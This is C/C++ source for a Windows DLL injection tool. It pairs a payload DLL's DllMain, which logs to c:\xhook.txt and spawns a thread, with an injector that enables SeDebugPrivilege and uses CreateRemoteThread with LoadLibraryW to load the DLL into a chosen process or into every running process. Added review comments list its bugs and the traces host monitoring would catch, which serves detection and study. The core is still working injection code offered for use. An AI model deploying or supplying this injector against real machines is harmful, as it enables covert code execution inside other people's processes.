// Entry point of xhook.dll, the payload side of the injector further down.
// Every call appends a line to c:\xhook.txt; on DLL_PROCESS_ATTACH it also
// starts a thread running mainfn (declared outside this excerpt, as are the
// ofstream/ios_base/endl names, which need <fstream> and the std namespace).
// NOTE(review): the fixed log path c:\xhook.txt is an on-disk artefact of
// this DLL being loaded into a process — a useful host indicator when
// investigating where it ended up.
// NOTE(review): CreateThread from DllMain runs while the loader lock is held;
// the DllMain documentation advises against it — confirm mainfn copes.
// @param hModule            module handle (unused)
// @param ul_reason_for_call DLL_PROCESS_ATTACH / DLL_THREAD_* / DLL_PROCESS_DETACH
// @param lpReserved         unused
// @return always TRUE — the load is never refused
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
// Unconditional log entry, written for every reason code.
{
ofstream f1("c:\\xhook.txt", ios_base::app);
if(f1)
{
f1<<"xhook.dll:DllMain"<<endl;
f1.close();
}
}
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// Thread handle and return value are discarded; a failed CreateThread
// goes unnoticed.
CreateThread(0, 0, mainfn, 0, 0, 0);
// Second log entry, only on process attach.
{
ofstream f1("c:\\xhook.txt", ios_base::app);
if(f1)
{
f1<<"xhook.dll:DLL_PROCESS_ATTACH"<<endl;
f1.close();
}
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/***************************************************************|
code ripped from jiurl at mail.china.com
modified by eyas <eyas at xfocus.org>
/***************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#pragma comment (lib,"Advapi32.lib")
// Forward declaration; inject() is defined below, after main().
int inject(DWORD pid, char *dll);
// Enables SeDebugPrivilege (SE_DEBUG_NAME) on the current process token.
// @return FALSE if the LUID lookup fails or AdjustTokenPrivileges leaves a
//         non-zero last error; TRUE otherwise.
// NOTE(review): if OpenProcessToken fails this only prints and carries on
// with an uninitialised hToken. hToken is never closed (no CloseHandle).
// The AdjustTokenPrivileges return value is ignored and GetLastError is read
// without a preceding SetLastError(0); per the API docs the call reports
// ERROR_NOT_ALL_ASSIGNED when the privilege is not held by the token (e.g. a
// non-administrator caller), which this check treats as failure.
// NOTE(review): TOKEN_ALL_ACCESS is broader than needed here;
// TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY is what AdjustTokenPrivileges requires.
BOOL SetPrivilege()
{
TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken))
{
// Falls through on failure — no return here.
printf("\nOpen Current Process Token failed:%d",GetLastError());
}
//printf("\nOpen Current Process Token ok!");
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
// Single privilege, requested as enabled (the disable branch is commented out).
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
//if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
//else
// tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError() );
return FALSE;
}
return TRUE;
}
// Command-line entry point: `<prog> <dll_full_path> <pid>`.
// pid != 0 targets one process; pid == 0 walks a Toolhelp process snapshot
// and calls inject() for every entry (presumably including this process).
// NOTE(review): `void main` is non-standard. argv[2] goes through atoi, so
// any non-numeric value becomes 0 and silently selects the all-process path.
// NOTE(review): hSnapshot is never compared against INVALID_HANDLE_VALUE and
// the Process32First result is unchecked, so on failure the do/while body
// still runs once with an uninitialised PROCESSENTRY32. SetPrivilege()'s
// return value is ignored as well.
void main(int argc, char **argv)
{
DWORD pid;
HANDLE hSnapshot = NULL;
PROCESSENTRY32 pe;
if(argc!=3)
{
printf( "code ripped from jiurl <jiurl at mail.china.com>\n"
"modifed by eyas <eyas at xfocus.org>\n"
"Usage: %s <dll_full_path)> <pid>\n\n"
"pid != 0 -> inject dll to specify process\n"
"pid == 0 -> inject dll to all process\n", argv[0]);
return;
}
SetPrivilege();
pid = atoi(argv[2]);
if(pid)
inject(pid, argv[1]);
//inject to all process
else
{
// Snapshot of all processes; only dwSize is initialised before the walk.
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
// inject() always returns 0, so no per-process outcome is collected here.
inject(pe.th32ProcessID, argv[1]);
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle (hSnapshot);
}
}
// Loads the DLL at path `dll` into process `pid`: the path is written into the
// target as a wide string and a remote thread is started on LoadLibraryW.
// @param pid target process id
// @param dll narrow (ANSI) DLL path; copied into a 256-byte stack buffer
// @return always 0 — the outcome is only reported through printf
// NOTE(review): this is the well-known CreateRemoteThread/LoadLibraryW
// pattern; from a defensive standpoint a remote thread in another process
// whose start address is LoadLibraryW is exactly what host monitoring looks
// for, and the log file written by the DLL's DllMain adds an on-disk trace.
// NOTE(review): visible defects — the results of OpenProcess, VirtualAllocEx,
// WriteProcessMemory and GetProcAddress are never checked; the remote buffer
// is never freed (no VirtualFreeEx); hRemoteProcess and hRemoteThread are
// never closed; strcat into CurPath[256] has no length check, so a `dll`
// argument of 256 bytes or more overruns the stack buffer.
int inject(DWORD pid, char *dll)
{
PWSTR pszLibFileRemote = NULL;
HANDLE hRemoteProcess = NULL,hRemoteThread = NULL;
char CurPath[256];
// Access rights requested on the target; returns NULL on failure (unchecked).
hRemoteProcess = OpenProcess(
PROCESS_QUERY_INFORMATION | // Required by Alpha
PROCESS_CREATE_THREAD | // For CreateRemoteThread
PROCESS_VM_OPERATION | // For VirtualAllocEx/VirtualFreeEx
PROCESS_VM_WRITE, // For WriteProcessMemory
FALSE, pid);
//GetCurrentDirectory(256,CurPath);
//strcat(CurPath,"\\");
// Unbounded copy of the caller's path into a fixed-size buffer.
memset(CurPath, 0, sizeof(CurPath));
strcat(CurPath, dll);
// Byte length of the UTF-16 string incl. terminator, assuming one WCHAR per
// input byte (holds for ASCII; multibyte CP_ACP input yields fewer WCHARs).
int len = (strlen(CurPath)+1)*2;
WCHAR wCurPath[256];
// Conversion is bounded to 256 WCHARs by the last argument.
MultiByteToWideChar(CP_ACP,0,CurPath,-1,wCurPath,256);
// Remote buffer holding the path; never released by this function.
pszLibFileRemote = (PWSTR)
VirtualAllocEx(hRemoteProcess, NULL, len, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess, pszLibFileRemote,
(PVOID) wCurPath, len, NULL);
// Resolved in the calling process and then used as the thread start
// address in the target.
PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
pfnThreadRtn, pszLibFileRemote, 0, NULL);
// Only the final step is checked; earlier failures show up here indirectly.
if(hRemoteThread == NULL)
printf("[-] inject \"%s\" to %d failed.\n", dll, pid);
else
printf("[+] inject \"%s\" to %d success.\n", dll, pid);
return 0;
}